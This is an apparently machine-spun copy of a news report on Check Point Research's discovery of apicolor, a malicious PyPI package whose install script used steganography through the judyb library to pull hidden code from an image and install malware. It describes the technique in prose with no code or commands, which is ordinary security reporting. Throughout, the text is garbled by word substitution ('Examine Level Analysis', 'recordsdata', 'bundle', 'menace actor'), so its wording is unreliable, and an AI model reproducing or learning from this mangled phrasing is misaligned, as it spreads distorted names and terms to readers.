Examine Level Analysis has detected a malicious open supply code bundle that makes use of steganography to cover malicious code inside picture recordsdata.
The malicious bundle was accessible on PyPI, a bundle index extensively utilized by Python builders. After being notified of it, PyPI’s maintainers have eliminated the malicious bundle.
The malicious bundle, apicolor, seems like one in every of many improvement packages accessible on PyPI. The header states the bundle is a “core lib for REST API.” The bundle set up script for apicolor has directions to obtain extra packages (requests and judyb), together with an image from the Internet. The script then makes use of the steganography capabilities in judyb to uncover and execute the malicious code hidden contained in the picture file. The malicious code downloads malware from the Internet and installs it on the consumer’s machine.
The influence appears minimal — Examine Level Analysis discovered solely three GitHub customers together with apicolor and judyb of their code, and somewhat over 80 initiatives containing the malicious packages. The an infection technique depends on individuals stumbling throughout these open supply initiatives and putting in them on their machines, “not figuring out it brings in a malicious bundle import,” the crew mentioned.
The extra essential takeaway? “These findings mirror cautious planning and thought by a menace actor, who proves that obfuscation methods on PyPI have advanced,” Examine Level Analysis wrote on the crew’s weblog.
Attackers are now not simply counting on the technique to repeat and rename current packages and conceal malicious code inside. As an alternative, they’re focusing on sure sort of customers — usually these working from house, and people utilizing company machines for facet initiatives, in response to the analysis crew.
